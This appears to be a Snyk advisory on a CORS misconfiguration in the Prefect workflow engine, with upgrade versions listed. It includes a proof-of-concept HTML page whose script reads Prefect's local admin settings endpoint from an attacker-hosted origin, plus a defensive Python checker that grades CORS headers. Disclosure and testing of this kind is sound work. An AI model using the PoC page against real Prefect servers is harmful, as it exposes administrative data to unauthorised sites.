Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Upgrade prefect to version 2.20.17, 3.0.3 or higher.
Prefect is a new workflow management system, designed for modern infrastructure and powered by the open-source Prefect Core workflow engine. Users organize Tasks into Flows, and Prefect takes care of the rest.
Affected versions of this package are vulnerable to Origin Validation Error due to a misconfiguration in the handling of CORS policies. An attacker can access sensitive data and potentially disrupt services by sending requests from unauthorized domains.
cors.html on attacker server:

<!DOCTYPE html>
<html>
  <head>
    <title>CORS PoC</title>
  </head>
  <body>
    <h1>CORS PoC</h1>
    <script>
      fetch('http://127.0.0.1:4200/api/admin/settings', {
        method: 'GET',
        headers: {
          'Origin': 'http://malicious-site.com'
        }
      })
        .then(response => response.text()) // Convert the response to text
        .then(data => {
          alert('CORS PoC Response:\n' + data); // Alert the entire response
        })
        .catch(error => {
          alert('CORS PoC Error:\n' + error); // Alert any error that occurs
        });
    </script>
  </body>
</html>
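To check an instance for this class of misconfiguration from the defender's side, the response headers returned to a cross-origin request are what matter (the browser supplies the Origin header itself; the fetch() above cannot override it). The following classifier is an added example, not Snyk's or Prefect's code; the probe origin is taken from the PoC and the sample header sets are constructed, not captured from a real server.

```python
# Added example: grade a server's CORS response headers for a request that
# carried "Origin: <probe_origin>". Sample responses below are constructed.
from dataclasses import dataclass

PROBE_ORIGIN = "http://malicious-site.com"   # the origin used in the PoC page


@dataclass(frozen=True)
class CorsFinding:
    severity: str   # "high", "medium", "low" or "none"
    reason: str


def classify_cors(headers: dict, probe_origin: str = PROBE_ORIGIN) -> CorsFinding:
    """Decide how permissive a CORS policy is from one response's headers.

    Header names are matched case-insensitively, as HTTP requires.
    """
    h = {k.lower(): v.strip() for k, v in headers.items()}
    acao = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").lower() == "true"
    if acao is None:
        return CorsFinding("none", "no Access-Control-Allow-Origin; the browser blocks the read")
    if acao == probe_origin:
        if creds:
            return CorsFinding("high", "arbitrary origin reflected with credentials; "
                                       "authenticated responses readable cross-site")
        return CorsFinding("medium", "arbitrary origin reflected; unauthenticated responses readable cross-site")
    if acao == "*":
        # Browsers refuse a credentialed response paired with "*", so only
        # anonymous data is exposed; still worth flagging on an admin API.
        return CorsFinding("low", "wildcard origin; any site can read unauthenticated responses")
    if acao == "null":
        # Sandboxed iframes and file:// pages send "Origin: null".
        return CorsFinding("high" if creds else "medium", "'null' origin allowed")
    return CorsFinding("none", f"allowlisted origin {acao}; probe origin not allowed")


# Constructed sample responses for the demo (not real Prefect output).
SAMPLES = {
    "reflected_with_creds": {"Access-Control-Allow-Origin": PROBE_ORIGIN,
                             "Access-Control-Allow-Credentials": "true"},
    "wildcard": {"Access-Control-Allow-Origin": "*"},
    "allowlisted": {"Access-Control-Allow-Origin": "http://127.0.0.1:4200"},
    "no_cors": {"Content-Type": "application/json"},
}


def audit(samples: dict = SAMPLES) -> dict:
    """Map each sample name to the severity its headers earn."""
    return {name: classify_cors(hdrs).severity for name, hdrs in samples.items()}
```

Feed it the headers from a real preflight or simple request to the API (for example the /api/admin/settings endpoint the PoC targets) to confirm the upgrade closed the gap.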